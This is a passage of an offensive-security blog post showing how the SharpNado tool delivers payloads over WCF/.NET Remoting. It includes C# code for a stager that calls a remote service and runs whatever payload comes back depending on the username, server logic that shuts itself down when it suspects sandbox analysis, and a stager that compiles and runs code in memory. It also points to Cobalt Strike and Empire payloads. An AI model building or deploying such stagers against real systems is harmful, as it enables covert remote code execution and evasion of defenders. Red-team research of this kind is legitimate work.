In this second example I will go over an extremely watered-down version of how you could use SharpNado to build smarter payloads.  The example provided with SharpNado is intended to be a building block and could be made as complex or simple as you like.  Since our SharpNado service is already running from our previous example, all we need to do is set the payloads to use in the SharpNado console.  For this example, I again will be using the same payloads from above. I will run the b64SharpSploitConsole payload if we hit our correct target and the b64NoPowershell_ipconfig_1 payload if we don't.



Looking at our simple stager example below, we can see that if the user anthem is who executed our stager, the stager will send a 1 back to the SharpNado service, or a 0 if the user isn't anthem.  Please keep in mind you could send back any information you like, including username, domain, etc.
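The client side of that check is only a few lines – roughly the sketch below, reusing the hypothetical IEvilService contract from earlier (the real stagers on GitHub differ in the details):

    using System;
    using System.ServiceModel;

    class Stager
    {
        static void Main()
        {
            // IEvilService is the hypothetical contract sketched in the WCF section above
            var factory = new ChannelFactory<IEvilService>(
                new BasicHttpBinding(), new EndpointAddress("http://192.168.55.250:8080/Evil"));
            IEvilService svc = factory.CreateChannel();

            // 1 = running as the expected user, 0 = anyone else; the server decides what comes back
            int flag = Environment.UserName.Equals("anthem", StringComparison.OrdinalIgnoreCase) ? 1 : 0;
            string payload = svc.CheckTarget(flag);

            // ...decode / decrypt / load and execute whatever the server handed back...
        }
    }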

Below is a partial screenshot of the example logic I provided with SharpNado. Another thing I want to point out is that I provided an example of how you could count how many times the service method has been called and, depending on a threshold, kill the service.  This is an example of building in countermeasures if we think we are being analyzed and/or sandboxed.
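The call-counting idea boils down to something like this sketch (hypothetical threshold and payload paths; the logic shipped with SharpNado is laid out differently):

    using System;
    using System.IO;
    using System.Threading;

    public class EvilService   // would implement the IEvilService contract sketched earlier
    {
        static int _calls = 0;
        const int MaxCalls = 5;                      // hypothetical threshold

        public string CheckTarget(int userFlag)
        {
            // Too many hits probably means we are being analyzed or sandboxed - shut the service down
            if (Interlocked.Increment(ref _calls) > MaxCalls)
                Environment.Exit(0);

            return userFlag == 1
                ? File.ReadAllText(@"Payloads\b64SharpSploitConsole.xml")        // expected target
                : File.ReadAllText(@"Payloads\b64NoPowershell_ipconfig_1.xml");  // everyone else
        }
    }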



Moving forward when we run our stager with our anthem user, we can see that we get a message server side and that the correct payload fired.

Now if I change the user to anthem2 and go through the process again, we can see that our non-malicious payload fires.  Keep in mind, the stagers could be set up in a way that values aren't hard-coded in.  You could have a list of users on your server and have your stager loop through that list and, if anything matches, execute, and if not, do something else.  Again, it's really up to your imagination.

Compile source code on the fly example:

Let's do one more quick example, but using C# source code.  This stager method will use System.CodeDom.Compiler, which does briefly drop artifacts to disk right before executing in memory, but one could create a stager that takes advantage of Roslyn, the open-source C# and VB compiler, to do the same thing without touching disk, as pointed out by @cobbr_io in his SharpShell blog post.
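For context, the compile-and-run step looks roughly like this sketch (in the real stager the source string would come down from the SharpNado service rather than being hard-coded):

    using System;
    using System.CodeDom.Compiler;
    using Microsoft.CSharp;

    class SourceCompileStager
    {
        static void Main()
        {
            // In the real stager this source arrives from the WCF/.NET Remoting service
            string source = @"public class P { public static void Run() { System.Console.WriteLine(""hello from compiled source""); } }";

            var provider = new CSharpCodeProvider();
            var cp = new CompilerParameters { GenerateInMemory = true, GenerateExecutable = false };
            cp.ReferencedAssemblies.Add("System.dll");

            // Note: CodeDom shells out to csc.exe and briefly writes temp files to disk -
            // the caveat mentioned above; a Roslyn-based stager can avoid that.
            CompilerResults results = provider.CompileAssemblyFromSource(cp, source);
            if (results.Errors.HasErrors) { Console.WriteLine("compile failed"); return; }

            results.CompiledAssembly.GetType("P").GetMethod("Run").Invoke(null, null);
        }
    }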

The below payload template example runs a No PowerShell payload that executes ipconfig but I also provided an example that would execute a PowerShell Empire or PowerShell Cobalt Strike Beacon on GitHub:

Then we will set up our stager.  In this example I will use the provided GitHub stager SharpNado_HTTP_WCF_SourceCompile.cs.

We will then take our already running SharpNado service and quickly add our payload.



Now when we run our stager, we should see our ipconfig output.







Conclusion:

Hopefully this has been a good intro to how one could use WCF or .NET Remoting offensively or at least sparked a few ideas for you to research on your own. I am positive that there are much better ways to accomplish this, but it was something that I came across while doing other research and I thought it would be neat to whip up a small POC.  Till next time and happy hacking!

Link to tools:

SharpNado - https://github.com/anthemtotheego/SharpNado

SharpNado Compiled Binaries - https://github.com/anthemtotheego/SharpNado/tree/master/CompiledBinaries

SharpSploitConsole - https://github.com/anthemtotheego/SharpSploitConsole

SharpSploit - https://github.com/cobbr/SharpSploit